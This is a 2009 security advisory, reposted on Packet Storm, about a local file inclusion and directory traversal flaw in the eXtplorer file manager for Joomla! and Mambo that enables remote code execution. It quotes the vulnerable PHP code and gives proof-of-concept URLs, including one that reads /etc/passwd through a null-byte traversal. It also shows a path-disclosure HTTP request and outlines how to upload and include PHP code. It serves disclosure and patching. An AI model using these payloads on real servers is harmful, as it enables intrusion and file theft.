what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eXtplorer Code Execution

eXtplorer Code Execution
Posted Mar 2, 2009
Authored by Juan Galiana Lara

The eXtplorer file management component for Joomla! and Mambo suffers from a local file inclusion vulnerability that allows for remote code execution. Versions below 2.0.0 are vulnerable.

tags | exploit, remote, local, code execution, file inclusion
SHA-256 | 0c8be37f45dd7716c3e21eb52f60bdef7051a84c86dec14021ede81924f79d5b

eXtplorer Code Execution

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-002
- Original release date: January 7th, 2009
- Last revised: March 2nd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 9/10 (CVSS scored)
=============================================

I. VULNERABILITY
-------------------------
eXtplorer standalone & Joomla!/Mambo Remote Code Execution vulnerability

II. BACKGROUND
-------------------------
eXtplorer is a web-based File Management Component for all your needs.
It has a desktop-application-like interface with drag&drop, grid and a
directory tree and makes heavy use of the ExtJS Javascript Library.
It's widely used to access and modify the files and directories on
your server via FTP or direct file access.
It runs natively under Joomla! 1.5.x, 1.0.x, Mambo component and can
also be used as a standalone app. Is based on Quixplorer (available at
http://sourceforge.net/projects/quixplorer/). eXtplorer is released
under a dual-license: the Mozilla Public License (MPL 1.1) and the GNU
General Public License (GNU/GPL).

III. DESCRIPTION
-------------------------
eXtplorer is prone to a local file include and directory traversal
vulnerability because the application fails to sufficiently sanitize
user-supplied input. The parameter 'lang' is not properly sanitized.
Since the application allows to upload files to the server could be
combined with previous vulnerabilities to allow an attacker to view
any local file or execute arbitrary code remotely in the context of
the webserver. This may aid in launching further attacks.

In order to perform the attack, an attacker could upload a PHP
maliciuos code (upload action is allowed by the application), then
exploit a bug to know the full path to the local file recently
uploaded (if 'display_errors' directive is set to On) and then include
it exploiting the local file include and directory traversal flaw
(using ../../path/to/file) to finally execute the php code.
Successfully explotation of this flaw may aid in the compromise of the
server in the context of the webserver.

The software is affected running standalone or as a Joomla!/Mambo
component.

IV. PROOF OF CONCEPT
-------------------------
The affected code:

File: include/init.php Line 100

$GLOBALS["language"] = $mainframe->getUserStateFromRequest(
'language', 'lang', $default_lang );

File: include/init.php Line: 145

// Necessary files

require_once( _EXT_PATH."/config/conf.php" );
if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"].".php")) {
require_once(
_EXT_PATH."/languages/".$GLOBALS["language"].".php" ); <- HERE
}
else {
require_once( _EXT_PATH."/languages/english.php" );
}
if(
file_exists(_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php")) {
require_once(
_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php" ); <- HERE
}
else {
require_once( _EXT_PATH."/languages/english_mimes.php" );
}

the file include/init.php is included in all the request to the
application.

Here is a poc:

PoC: http://site/path/?lang=../../path/to/maliciuos_uploaded_code
PoC: http://site/path/?lang=../../../../../etc/passwd%00

The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a '\0' character like /etc/passwd, if not only can include php
files, allowing to execute any php code he want.
Is also possible to hide the crafted parameters data including it
thougth POST method, making detection more difficult to site
administrator.

In order to successfully perform this attack the attacker must have
the full path where the files are uploaded, and it is easy to get
making a request like this:

POST /path/index.php HTTP/1.1
Host: host
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://host/path
Content-Length: 80
Cookie: PHPSESSID=<my_phpsessid>; eXtplorer=<my_cookie>
Pragma: no-cache
Cache-Control: no-cache
start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files

The response is a JSON file:

{"action":"","message":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","error":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","success":false}

Sending "x", the application came back "/var/www/path/x".

V. BUSINESS IMPACT
-------------------------
An attacker could execute arbitrary code remotely and maybe gain
access to the operating system of the server.

VI. SYSTEMS AFFECTED
-------------------------
Versions prior to 2.0.0 of eXtplorer are vulnerable.

VII. SOLUTION
-------------------------
Upgrade to version 2.0.1 of eXtplorer. It can be downloaded from
http://extplorer.sourceforge.net

VIII. REFERENCES
-------------------------
http://extplorer.sf.net

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
January 07, 2009: eXtplorer contacted
January 15, 2009: eXtplorer release version 2.0.1
March 02, 2009: Vulnerability published

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close